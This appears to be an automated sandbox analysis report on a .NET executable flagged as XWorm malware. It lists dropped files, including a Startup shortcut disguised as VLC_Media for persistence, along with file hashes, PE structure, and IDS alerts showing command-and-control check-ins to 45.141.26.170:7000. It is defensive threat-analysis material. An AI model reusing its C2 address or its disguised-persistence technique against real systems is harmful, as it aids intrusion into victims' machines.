                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:@...e...........................................................

                                                                C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\18fvs4AVae.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):29
                                                                Entropy (8bit):3.598349098128234
                                                                Encrypted:false
                                                                SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                Malicious:false
                                                                Preview:....### explorer ###..[WIN]r

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ydybnru.pye.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mqpufjx.445.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cs4xvllz.2eu.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0gmtdxn.qhm.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkg3mn5d.100.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igj1vjc1.cmq.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyqsndom.0xl.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oph1kxjd.htd.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pjzxblcs.pz0.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qqjkkage.p2o.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swg2tfos.lam.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjxdpdwh.w1i.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uaa2hjgv.xxw.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0d5b5d3.coe.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1cznaaq.xer.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqvsoues.4p0.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk

                                                                Download File
                                                                Process:C:\Users\user\Desktop\18fvs4AVae.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 18:55:55 2024, mtime=Sat Nov 23 18:55:55 2024, atime=Sat Nov 23 18:55:55 2024, length=51200, window=hide
                                                                Category:dropped
                                                                Size (bytes):675
                                                                Entropy (8bit):4.5950412219183265
                                                                Encrypted:false
                                                                SSDEEP:12:8HWWEWcU5cCjObegSLwLj45fOjActb1PzHKc5KcBBmV:8HWWNMr/4QAwVqcUcBBm
                                                                MD5:58E8A2F19E508019E405D82B45630D71
                                                                SHA1:461842DABD22A1E0AA58A3CE05A7A561F0F0692B
                                                                SHA-256:9AFBCD90AE8F6FF6B2228C03E36F0B519D2AE69504BCA0D600FAF853F5A79384
                                                                SHA-512:EB78896F0281E2562A2C0A9026A9409EB929F0CC88BE55E37F03781D24A2697C2CDA40F58DE967695C5067BE568793280BABAF21394C8E607D879A957DE5BDAB
                                                                Malicious:false
                                                                Preview:L..................F.... .......=.......=.......=...............................P.O. .:i.....+00.../C:\...................`.1.....wY.. PROGRA~3..H......O.IwY.....g.....................Oo .P.r.o.g.r.a.m.D.a.t.a.....h.2.....wY.. VLC_ME~1.EXE..L......wY..wY............,...............M...V.L.C._.M.e.d.i.a...e.x.e.......K...............-.......J...........i.&r.....C:\ProgramData\VLC_Media.exe..4.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.V.L.C._.M.e.d.i.a...e.x.e.`.......X.......332260...........hT..CrF.f4... .*.F.....,.......hT..CrF.f4... .*.F.....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.451736682018347
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:18fvs4AVae.exe
                                                                File size:51'200 bytes
                                                                MD5:59a9510540fec35043b990deb270b139
                                                                SHA1:54d66862a4c08ebcba8029ec99d558725603f486
                                                                SHA256:9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
                                                                SHA512:011ea8ffe125a6f68f149a0a5b7bcd95197ac8b7d3d7d362807ef984e971411f2b125921fbcbc183e95633555ac58c4e287b6a858f19e077dd9a8eb0975e3e06
                                                                SSDEEP:1536:Of05a/CTjS894Fc9UR68OMqddS1EAd8IIR:Of05a/CTJ94Fc9U3OM6gEA6IIR
                                                                TLSH:13336C4477C44222D5FE5BF999B356460730AE038923DB5E0CD8AE9B3B637C48B127D6
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%8g................................. ........@.. ....................... ............@................................

                                                                File Icon

                                                                Icon Hash:4c5e16933971838c

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x40b7ae
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x673825D0 [Sat Nov 16 04:55:44 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb7540x57.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x2b1c.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x97b40x9800e130d458ef2cd9049e881ec270925f64False0.49223889802631576data5.70756197062875IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xc0000x2b1c0x2c0037c983ba9f88bbb210dd403862e7123dFalse0.3532492897727273data3.942086469508632IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x100000xc0x200632045a602183aa3c38b803477d675edFalse0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0xc1300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.34221991701244814
                                                                RT_GROUP_ICON0xe6d80x14data1.1
                                                                RT_VERSION0xe6ec0x244data0.4724137931034483
                                                                RT_MANIFEST0xe9300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-23T20:56:06.689976+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:56:06.689976+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:56:07.443101+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44973845.141.26.1707000TCP
                                                                2024-11-23T20:56:08.027932+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:56:08.091499+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973845.141.26.1707000TCP
                                                                2024-11-23T20:56:19.446957+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:56:19.448824+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973845.141.26.1707000TCP
                                                                2024-11-23T20:56:30.886735+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:56:30.891652+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973845.141.26.1707000TCP
                                                                2024-11-23T20:56:36.678510+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:56:36.678510+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:56:42.292240+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:56:42.296449+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973845.141.26.1707000TCP
                                                                2024-11-23T20:56:53.715117+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:56:53.717446+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973845.141.26.1707000TCP
                                                                2024-11-23T20:57:00.915702+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:57:00.938069+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973845.141.26.1707000TCP
                                                                2024-11-23T20:57:06.709253+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:57:06.709253+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.26.1707000192.168.2.449738TCP
